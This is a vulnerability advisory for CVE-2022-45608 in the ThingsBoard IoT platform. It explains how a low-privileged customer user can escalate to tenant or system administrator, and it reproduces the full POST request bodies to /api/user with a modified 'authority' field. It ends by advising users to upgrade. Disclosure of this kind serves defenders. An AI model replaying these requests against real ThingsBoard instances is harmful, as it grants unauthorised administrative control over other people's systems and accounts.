¶ Access control vulnerability discovered in the ThingsBoard IoT platform
On December 2022, a vulnerability on the ThingsBoard IoT platform was discovered, where a normal user’s privileges can be escalated, by doing a simple post with an additional header, and exploiting the associated flaws, to take control over the entire platform and related accounts. Upon reporting of the vulnerability to the vendor, it was quickly resolved. While the communication has been largely monodirectional, the time to resolution and patch was swift. It is always a pleasure to see a development team taking user security so seriously.
In the latest version of the product, the vulnerability has been remediated. We strongly urge users of the platform to upgrade to the latest version. This is of extra importance for anyone who does not have control of all end users, as an initial access is needed to obtain the increased permissions.
¶ ThingsBoard Vulnerability summary
- Product: ThingsBoard IoT platform
- Affected version(s): v3.4.2 (December 1, 2022) and possibly older
- CVE-ID: CVE- 2022-45608
¶ Vulnerability description
The ThingsBoard IoT platform was affected by a vertical privilege escalation vulnerability.
A low privileged user (CUSTOMER_USER) was able to escalate his privileges (vertically) and become Administrator (TENANT_ADMIN) or system administrator (SYS_ADMIN) on the web application using a simple POST request with the platform’s REST API.
In order to exploit the vulnerability, the attacker would need to know the corresponding API's parameter (“authority”:“value”) and default user UUIDs, which can be easily identified from ThingsBoard’s official GitHub repository.
¶ Vulnerability impact
Through our test on the latest version of the platform, we have reason to believe that all customers are affected.
¶ Recreation flow
To verify the vulnerability, these steps were taken by our security researcher:
- Login under the cloud edition or install the affected ThingsBoard version (3.4.2) on your onpremises. Affected versions:
a. ThingsBoard Professional Edition Cloud
b. ThingsBoard Community Edition
c. ThingsBoard Professional Edition - After you signup and login into your main ThingsBoard dashboard, intercept the outgoing POST request, and modify the ‘authority’ value. In this example, we will escalate to a tenant administrator.
¶ Getting Tenant Administrator access
- Request: POST
- Affected URL:
https://<thingsboardinstance>/api/user?sendActivationMail=false
{
"id":
{
"entityType": "USER",
"id": "XXXXXXXXX"
},
"createdTime": 0,
"additionalInfo":
{
"lastLoginTs": 1668422898320,
"failedLoginAttempts": 0,
"userCredentialsEnabled": true,
"lang": "en_US",
"homeDashboardHideToolbar": false
},
"tenantId":
{
"entityType": "TENANT",
"id": "XXXXXXXXXX"
},
"email": [email protected], "authority": "TENANT_ADMIN", "firstName": "Winston", "lastName": null,
"name": [email protected],
"language": "en_US",
"homeDashboardHideToolbar": false
}
¶ Getting System Administrator access
- Request: POST
- Affected URL:
https://<thingsboardinstance>/api/user?sendActivationMail=false
{
"id":
{
"entityType": "USER",
"id": "XXXXXXXXX"
},
"createdTime": 0,
"additionalInfo":
{
"description": "",
"defaultDashboardId": null,
"defaultDashboardFullscreen": false,
"homeDashboardId": null,
"homeDashboardHideToolbar": false,
"userCredentialsEnabled": true,
"failedLoginAttempts": 0,
"lang": "en_US"
},
"tenantId":
{
"entityType": "TENANT",
"id": "13814000-1dd2-11b2-8080-808080808080"
},
"email": [email protected], "authority": "SYS_ADMIN", "firstName": "John", "lastName": "Wick",
"name": [email protected],
"language": "en_US",
"homeDashboardId": null,
"homeDashboardHideToolbar": false
}
¶ Screenshots
In following screenshots, you can see how the low-level user is able to access admin resources.
Here’s the low-level user and his original ID and token:
Here’s the information that the low-level user can access:
Here is what it looks like after the user escalates permissions to Tenant Admin:
¶ Remediation
To remediate this vulnerability, update to the latest version of the ThingsBoard IoT platform.